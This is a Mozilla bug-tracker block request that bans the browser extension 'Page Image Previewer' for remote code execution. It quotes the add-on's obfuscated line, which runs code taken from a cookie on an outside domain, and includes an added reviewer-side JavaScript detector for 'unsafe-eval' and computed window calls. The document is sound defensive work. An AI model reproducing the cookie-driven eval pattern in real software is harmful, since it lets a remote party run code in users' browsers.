Closed Bug 1551260 Opened 6 years ago Closed 6 years ago

Extension Block Request: Page Image Previewer

Categories

(Toolkit :: Blocklist Policy Requests, task)

task
Not set
normal

Tracking

RESOLVED FIXED

People

(Reporter: robwu, Assigned: TheOne)

Details

Extension name: Page Image Previewer
Extension versions affected: <all versions>
Platforms affected: <all platforms>
Block severity: hard

Reason

Remote code execution.

Extension IDs

{61121092-5257-4607-b16a-12364832f0e4}

Additional Information

The extension's manifest.json Content-Security-Policy contains 'unsafe-eval'. The source code contains the following snippet:

window[wec[0]](firm(wec[1]))

... and the variables are extracted from a cookie at the helpfoxpro.com domain, which enables remote code execution.
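
A reviewer-side check for the two signals named in the report above, as an added example (not part of the bug report and not Mozilla's review tooling): it flags 'unsafe-eval' in a manifest's CSP and calls of the form window[computed key](...). The function names and the sample manifest and source file are constructed for illustration.

```javascript
// Added review aid; a heuristic text scan, not a JavaScript parser.
// CSP string(s) from a manifest: a string in Manifest V2, an object
// such as { extension_pages: "..." } in Manifest V3.
function cspStrings(manifest) {
  const csp = manifest.content_security_policy;
  if (!csp) return [];
  return typeof csp === "string" ? [csp] : Object.values(csp);
}

// True if the directive governing scripts allows 'unsafe-eval'.
function allowsUnsafeEval(csp) {
  const directives = new Map();
  for (const part of csp.split(";")) {
    const [name, ...values] = part.trim().toLowerCase().split(/\s+/);
    if (name && !directives.has(name)) directives.set(name, values);
  }
  const scriptSrc = directives.get("script-src") || directives.get("default-src") || [];
  return scriptSrc.includes("'unsafe-eval'");
}

// Find window[<runtime value>](...): a global looked up by a computed key and called.
function findDynamicGlobalCalls(source) {
  const hits = [];
  const re = /\b(?:window|self|globalThis)\s*\[/g;
  let m;
  while ((m = re.exec(source)) !== null) {
    let depth = 1, i = re.lastIndex;
    for (; i < source.length && depth > 0; i++) { // walk to the matching ']'
      if (source[i] === "[") depth++;
      else if (source[i] === "]") depth--;
    }
    if (depth !== 0) continue; // unbalanced brackets: skip
    const key = source.slice(re.lastIndex, i - 1).trim();
    const literal = /^(['"`])[^'"`]*\1$/.test(key) || /^\d+$/.test(key);
    if (!literal && /^\s*\(/.test(source.slice(i))) hits.push(source.slice(m.index, i));
  }
  return hits;
}

function reviewExtension(manifest, files) {
  const findings = [];
  if (cspStrings(manifest).some(allowsUnsafeEval)) findings.push({ rule: "csp-unsafe-eval", file: "manifest.json" });
  for (const [file, source] of Object.entries(files))
    for (const snippet of findDynamicGlobalCalls(source)) findings.push({ rule: "dynamic-global-call", file, snippet });
  return findings;
}

// Constructed sample modelled on the report, not the add-on's real files.
const SAMPLE_MANIFEST = { content_security_policy: "script-src 'self' 'unsafe-eval'; object-src 'self'" };
const SAMPLE_FILES = { "background.js": "window[wec[0]](firm(wec[1]))" };
```

Either finding alone warrants a manual look; together with a key read from remotely controlled storage such as a cookie, they match the pattern described in this report.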

Assignee: nobody → awagner
Status: NEW → ASSIGNED
Type: defect → task

I reviewed this add-on and confirm it violates Mozilla's add-on policy by executing remote code.

The block has been staged. Philipp, can you please review and push?

Flags: needinfo?(philipp)

Done

Group: blocklist-requests
Status: ASSIGNED → RESOLVED
Closed: 6 years ago
Flags: needinfo?(philipp)
Resolution: --- → FIXED